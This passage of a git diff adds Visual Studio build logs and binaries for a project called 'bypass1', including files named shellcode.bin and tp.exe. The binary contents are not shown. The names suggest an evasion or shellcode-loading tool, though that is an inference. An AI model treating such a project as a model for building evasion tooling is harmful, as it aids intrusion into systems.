index 0000000..df02872
Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog differ
diff --git a/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..7486a2f
Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog differ
diff --git a/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog
new file mode 100644
index 0000000..0da6965
--- /dev/null
+++ b/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog
@@ -0,0 +1 @@
+^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\TP\X64\RELEASE\BYPASS1.OBJ
diff --git a/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..31f6af7
Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog differ
diff --git a/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate b/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate
new file mode 100644
index 0000000..1fb5cc0
--- /dev/null
+++ b/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
+Release|x64|C:\Users\Jason\source\repos\bypass1\|
diff --git a/bypass1/x64/Release/shellcode.bin b/bypass1/x64/Release/shellcode.bin
new file mode 100644
index 0000000..de7871f
Binary files /dev/null and b/bypass1/x64/Release/shellcode.bin differ
diff --git a/bypass1/x64/Release/tp.exe b/bypass1/x64/Release/tp.exe
new file mode 100644
index 0000000..97e8ea9
Binary files /dev/null and b/bypass1/x64/Release/tp.exe differ